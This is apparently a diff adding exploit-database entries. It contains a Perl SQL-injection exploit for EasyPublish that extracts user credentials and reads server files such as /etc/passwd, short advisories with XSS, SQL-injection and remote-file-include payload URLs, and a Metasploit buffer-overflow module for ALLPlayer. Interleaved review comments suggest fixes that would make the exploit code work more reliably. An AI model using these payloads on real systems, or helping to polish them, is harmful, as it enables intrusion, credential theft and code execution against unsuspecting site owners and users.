platforms/php/webapps/32089.pl Executable file

@ -0,0 +1,203 @@
source: http://www.securityfocus.com/bid/30307/info
EasyPublish is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include SQL-injection and cross-site scripting vulnerabilities.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
EasyPublish 3.0tr is vulnerable; other versions may also be affected.
NOTE: This BID was originally titled 'EasyPublish Multiple Input Validation Vulnerabilities', but has been changed to better describe the issues.
#!/usr/bin/perl
#----------------------------------------------------------------
#
#Script : EasyPublish 3.0tr
#
#Type : Multiple Vulnerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit )
#
#Variable Method : GET
#
#Alert : High
#
#----------------------------------------------------------------
#
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#
#My Official Website : HTTP://FEREIDANI.IR
#
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#
#----------------------------------------------------------------
#
#Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR
#
#----------------------------------------------------------------
#
#Script Download : http://myiosoft.com/download/EasyPublish/easypublish-30tr.zip
#
#----------------------------------------------------------------
#
#Xss 1 : http://Example//staticpages/easypublish/index.php?PageSection=0&page=individual&table=edp_News&read=%<script>alert(document.cookie);</script>
#
#----------------------------------------------------------------
#
#SQL Injection :
#
#SQL 1 : http://Example/staticpages/easypublish/index.php?PageSection=0&table=edp_News&page=individual&fage=search&read=1+union+all+select+1,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),3,4,1,5+FROM+edp_puusers/*;--
#
#
#----------------------------------------------------------------
#
# Tnx : God
#
# HTTP://IRCRASH.COM
#
#----------------------------------------------------------------
use LWP;
use HTTP::Request;
use Getopt::Long;
sub header
{
print "
****************************************************
* EasyPublish 3.0tr Exploit *
****************************************************
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani *
*My Official Website : http://fereidani.ir *
****************************************************";
}
sub usage
{
print "
* Usage : perl $0 http://Example/
****************************************************
";
}
$url = ($ARGV[0]);
if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url."/";}
if($url !~ /http:\/\//){$url = "http://".$url;}
sub xpl1()
{
$vul = "/staticpages/easypublish/index.php?PageSection=0&table=edp_News&page=individual&fage=search&read=1+union+all+select+1,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),3,4,1,5+FROM+edp_puusers/*";
$requestpage = $url.$vul;
my $req = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);
$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/<enduser>/,$name);
$name = @name[0];
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(/<endpass>/,$password);
$password = @password[0];
if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}
print "\n Username: ".$name."\n\n";
print " Password: " .$password."\n\n";
}
#XPL2
sub xpl2()
{
print "\n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd";
print "\n Enter File Address :";
$fil3 = <stdin>;
$vul = "/staticpages/easypublish/index.php?PageSection=0&table=edp_News&page=individual&fage=search&read=1+union+all+select+1,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),3,4,1,5+FROM+edp_puusers/*";
$requestpage = $url.$vul;
my $req = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);
$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/<enduser>/,$name);
$name = @name[0];
if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}
open (FILE, ">".source.".txt");
print FILE $name;
close (FILE);
print " File Save In source.txt\n";
print "";
}
#XPL2 END
#Starting;
print "
****************************************************
* EasyPublish 3.0tr Exploit *
****************************************************
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani *
*My Official Website : http://fereidani.ir *
****************************************************
* Mod Options : *
* Mod 1 : Find mysql username and root password *
* Mod 2 : Save PHP config source in your system *
****************************************************";
print "\n \n Enter Mod : ";
$mod=<stdin>;
if ($mod=="1" or $mod=="2") { print "\n Exploiting .............. \n"; } else { print "\n Unknown Mod ! \n Exploit Failed !"; };
if ($mod=="1") { xpl1(); };
if ($mod=="2") { xpl2(); };
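Review bot: The file write in `xpl2`, `open (FILE, ">".source.".txt");`, ignores the return value of `open`, and `source` is a bareword that only resolves to the string "source" because the script never enables `use strict`; when the open fails the retrieved data is silently dropped while the script still prints "File Save In source.txt". The guarded three-argument form `open(my $fh, '>', 'source.txt') or die "cannot write source.txt: $!";` makes that failure visible. The globals `$contlen` and `$poststring` used for the Content-Length header and request body in both `xpl1` and `xpl2` are never assigned anywhere in the file, so both requests go out with an undefined Content-Length and an empty body; either assign them or remove those two lines. From a log-review standpoint the request is distinctive on its face: a POST to a query-string URL with the hard-coded Referer "IRCRASH.COM" and User-Agent "Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9", both stable markers in web server access logs.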


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/30309/info
Maran PHP Blog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/comments.php?id=%3E%3C%3E%27%3Cscript%3Ealert(document.cookie)%3C/script%3E

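--- a/platforms/php/webapps/32091.txt
+++ b/platforms/php/webapps/32091.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/30310/info
+MyBlog is prone to multiple information-disclosure vulnerabilities because the application fails to properly restrict access to sensitive files.
+An unprivileged attacker may exploit these issues to obtain sensitive information.
+MyBlog 0.9.8 is vulnerable; other versions may also be affected.
+http://www.example.com/config/mysqlconnection.inc
+http://www.example.com/config/mysqlconnection%20-%20Copy.inc
+http://www.example.com/admin/setup.php
+http://www.example.com/config/settings.inc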


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30312/info
Flip is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit this issue to execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Flip 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/config.php?incpath=[SHELL]


@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/30318/info
phpKF is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/lab/phpkf/yonetim/forum_duzen.php?kip=forum_duzenle&fno='+union+select+kullanici_adi,concat(database(),0x3a,version()),sifre+from+phpkf_kullanicilar/*

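--- a/platforms/windows/local/32074.rb
+++ b/platforms/windows/local/32074.rb
@@ -0,0 +1,107 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core'
+class Metasploit3 < Msf::Exploit::Remote
+Rank = NormalRanking
+include Msf::Exploit::FILEFORMAT
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'ALLPlayer M3U Buffer Overflow',
+'Description' => %q{
+This module exploits a stack-based buffer overflow vulnerability in
+ALLPlayer 2.8.1, caused by a long string in a playlist entry.
+By persuading the victim to open a specially-crafted .M3U file, a
+remote attacker could execute arbitrary code on the system or cause
+the application to crash. This module has been tested successfully on
+Windows 7 SP1.
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'metacom', # Vulnerability discovery
+'Mike Czumak', # Original exploit
+'Gabor Seljan' # Metasploit module
+],
+'References' =>
+[
+[ 'BID', '62926' ],
+[ 'BID', '63896' ],
+[ 'EDB', '28855' ],
+[ 'EDB', '29549' ],
+[ 'EDB', '29798' ],
+[ 'EDB', '32041' ],
+[ 'OSVDB', '98283' ],
+[ 'URL', 'http://www.allplayer.org/' ]
+],
+'DefaultOptions' =>
+{
+'ExitFunction' => 'process'
+},
+'Platform' => 'win',
+'Payload' =>
+{
+'DisableNops' => true,
+'BadChars' => "\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f",
+'Space' => 3060,
+'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed,
+'EncoderOptions' =>
+{
+'BufferRegister' => 'EAX'
+}
+},
+'Targets' =>
+[
+[ ' ALLPlayer 2.8.1 / Windows 7 SP1',
+{
+'Offset' => 301,
+'Ret' => "\x50\x45", # POP POP RET from ALLPlayer.exe
+'Nop' => "\x6e" # ADD BYTE PTR DS:[ESI],CH
+}
+]
+],
+'Privileged' => false,
+'DisclosureDate' => 'Oct 09 2013',
+'DefaultTarget' => 0))
+register_options(
+[
+OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u'])
+],
+self.class)
+end
+def exploit
+nop = target['Nop']
+sploit = rand_text_alpha_upper(target['Offset'])
+sploit << "\x61\x50" # POPAD
+sploit << target.ret
+sploit << "\x53" # PUSH EBX
+sploit << nop
+sploit << "\x58" # POP EAX
+sploit << nop
+sploit << "\x05\x14\x11" # ADD EAX,0x11001400
+sploit << nop
+sploit << "\x2d\x13\x11" # SUB EAX,0x11001300
+sploit << nop
+sploit << "\x50" # PUSH EAX
+sploit << nop
+sploit << "\xc3" # RET
+sploit << nop * 109
+sploit << payload.encoded
+sploit << rand_text_alpha_upper(10000) # Generate exception
+# Create the file
+print_status("Creating '#{datastore['FILENAME']}' file ...")
+file_create("http://" + sploit)
+end
+end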
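Review bot: The target name in `'Targets'` carries a stray leading space, `' ALLPlayer 2.8.1 / Windows 7 SP1'`, which is displayed verbatim in the module's target listing; it should read `'ALLPlayer 2.8.1 / Windows 7 SP1'`. The download URL in the header comment is also missing its colon, `http//metasploit.com/download`. In `exploit`, `'Offset' => 301` and `nop * 109` are undocumented magic numbers; a one-line comment on each stating what the count is measured against would spare the next maintainer from re-deriving them when the target list is extended. The `# Generate exception` comment on the trailing `rand_text_alpha_upper(10000)` is the only why-comment in the method and is a good model for those two.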